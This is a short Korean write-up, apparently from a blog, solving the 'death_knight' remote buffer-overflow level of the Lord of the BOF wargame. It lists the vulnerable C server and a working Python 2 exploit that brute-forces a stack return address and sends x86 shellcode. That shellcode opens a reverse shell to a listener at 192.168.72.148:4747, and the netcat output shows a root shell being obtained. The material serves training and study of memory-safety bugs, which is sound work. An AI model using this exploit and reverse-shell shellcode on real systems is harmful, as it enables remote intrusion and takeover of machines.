5일 정도 걸렸네요. 쓸데없는 거 잘못 건드리는 바람에..
여튼 드디어 풀었습니다.
[xavius@localhost xavius]$ cat death_knight.c
/*
The Lord of the BOF : The Fellowship of the BOF
- dark knight
- remote BOF
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <dumpcode.h>
/*
 * Forking TCP server: listens on port 6666 on all interfaces, greets each
 * client from a child process and reads one reply into a stack buffer.
 *
 * Defect this listing exists to demonstrate: recv() is given a limit of 256
 * bytes while `buffer` holds 40, so a longer reply is written past the end of
 * the buffer inside main()'s stack frame. The bounded form is
 * recv(client_fd, buffer, sizeof(buffer), 0) with the return value checked.
 * Build- and OS-level hardening (stack protector, non-executable stack,
 * address randomisation) limits the impact of such a bug but does not remove it.
 */
main()
{
    char buffer[40];                    /* 40 bytes; see the recv() call below */
    int server_fd, client_fd;
    struct sockaddr_in server_addr;
    struct sockaddr_in client_addr;
    int sin_size;
    /* Create the listening TCP socket; exit on failure. */
    if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("socket");
        exit(1);
    }
    /* Bind to port 6666 on every local address (INADDR_ANY). */
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(6666);
    server_addr.sin_addr.s_addr = INADDR_ANY;
    bzero(&(server_addr.sin_zero), 8);
    if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){
        perror("bind");
        exit(1);
    }
    if(listen(server_fd, 10) == -1){
        perror("listen");
        exit(1);
    }
    /* Accept loop: one forked child per connection. */
    while(1) {
        sin_size = sizeof(struct sockaddr_in);
        if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){
            perror("accept");
            continue;
        }
        /* fork() returns 0 in the child; a failed fork (-1) takes the parent path. */
        if (!fork()){
            /* Return values of send()/recv() are not checked. */
            send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);
            send(client_fd, "You : ", 6, 0);
            /*
             * Out-of-bounds write: up to 256 bytes from the network are copied
             * into the 40-byte buffer. The received data is never read again,
             * so the only effect of an oversized reply is stack corruption.
             */
            recv(client_fd, buffer, 256, 0);
            close(client_fd);
            /*
             * The child leaves the loop and runs to the end of main(); main()'s
             * return is where corrupted saved frame data would take effect
             * (assuming the usual x86 stack layout -- the layout itself is not
             * shown here).
             */
            break;
        }
        /* Parent: drop its copy of the client socket and reap exited children without blocking. */
        close(client_fd);
        while(waitpid(-1,NULL,WNOHANG) > 0);
    }
    close(server_fd);
}
# Python 2 script: the payload is a byte-valued str passed straight to send().
import socket

# 68 bytes of raw x86 machine code appended to the end of each message.
# The embedded constants c0 a8 48 94 and 12 8b correspond to 192.168.72.148
# and port 4747, the listener shown in the output below, and the ASCII bytes
# spell "//sh" and "/bin": the code connects back to that listener and starts
# a shell.
buf = ""
buf += "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66"
buf += "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0"
buf += "\xa8\x48\x94\x68\x02\x00\x12\x8b\x89\xe1\xb0\x66\x50"
buf += "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73"
buf += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0"
buf += "\x0b\xcd\x80"
# Every (i, j) pair is tried as the two low bytes of a 0xbfff____ address,
# one new connection per attempt: 255 values of i times 26 values of j.
# Seen from the server this is up to 6,630 short connections to port 6666,
# each delivering one 256-byte message -- presumably most of them end with
# the forked child crashing, which makes the attempt easy to spot in logs.
for i in range(255,0,-1):
    for j in range(1,256,10):
        sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        sock.connect(('192.168.72.143',6666))
        # Message layout, 256 bytes in total (the server's recv() limit):
        #   44 filler bytes (presumably the 40-byte buffer plus 4 bytes of
        #   saved frame data), a 4-byte little-endian address, then 0x90
        #   padding followed by buf.
        # A server that bounds recv() to sizeof(buffer) would never read past byte 40.
        payload="a"*44+chr(j)+chr(i)+"\xff\xbf"+"\x90"*(256-48-len(buf))+buf
        sock.send(payload)
        sock.close()
listening on [any] 4747 ...
192.168.72.143: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.72.148] from (UNKNOWN) [192.168.72.143] 1838
my-pass
euid = 520
got the life
id
uid=0(root) gid=0(root) euid=520(death_knight) egid=520(death_knight)